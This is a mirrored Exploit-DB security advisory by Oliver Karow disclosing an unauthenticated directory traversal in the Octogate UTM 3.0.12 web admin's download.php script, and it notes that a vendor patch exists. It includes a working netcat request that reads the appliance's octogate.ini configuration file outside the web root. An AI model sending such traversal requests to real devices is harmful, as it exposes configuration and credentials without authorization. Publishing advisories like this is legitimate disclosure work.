Octogate UTM 3.0.12 – Admin Interface Directory Traversal

• Exploit Database
• 20 阅读

• 作者： Oliver Karow
  日期： 2015-09-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/38129/

• # Exploit Title: Octogate UTM Admin Interface Directory Traversal
  # Date: 26.08.2015
  # Software Link: http://www.octogate.com
  # Exploit Author: Oliver Karow
  # Contact: oliver.karow@gmx.de
  # Website: http://www.oliverkarow.de
  # Category: Remote Exploit
  
  
  Affected Products/Versions
  --------------------------
  
  Product Name: Octogate
  Version: 3.0.12 - Virtual Appliance & Appliance
  
  
  Product/Company Information
  ---------------------------
  
  Octogate is a UTM Device, including the following features: Application
  Firewall, Intrusion Detection and -Prevention, Stateful- & Deep Packet
  Inspection, DoS- and DDoS protection and Reverse Proxy.
  
  Octogate IT Security Systems GmbH is based in Germany.
  
  
  Vulnerability Description
  -------------------------
  
  Octogate UTM Device is managed via web interface. The download function
  for SSL-Certifcate and Documentation is accessable without
  authentication, and allows access to files outside of the web root via
  the script /scripts/download.php.
  
  Example request:
  
  echo -en
  "GET /scripts/download.php?file=/../../../../../../octo/etc/ini.d/octogate.ini&type=dl
  HTTP/1.0\r\nHost: 192.168.0.177\r\nReferer:
  http://192.168.0.177\r\nConnection: close\r\n\r\n" | nc 192.168.0.177 80
  
  Patch Information
  -----------------
  
  Patch is available from vendor.
  
  Advisory Information
  --------------------
  
  http://www.oliverkarow.de/research/octogate.txt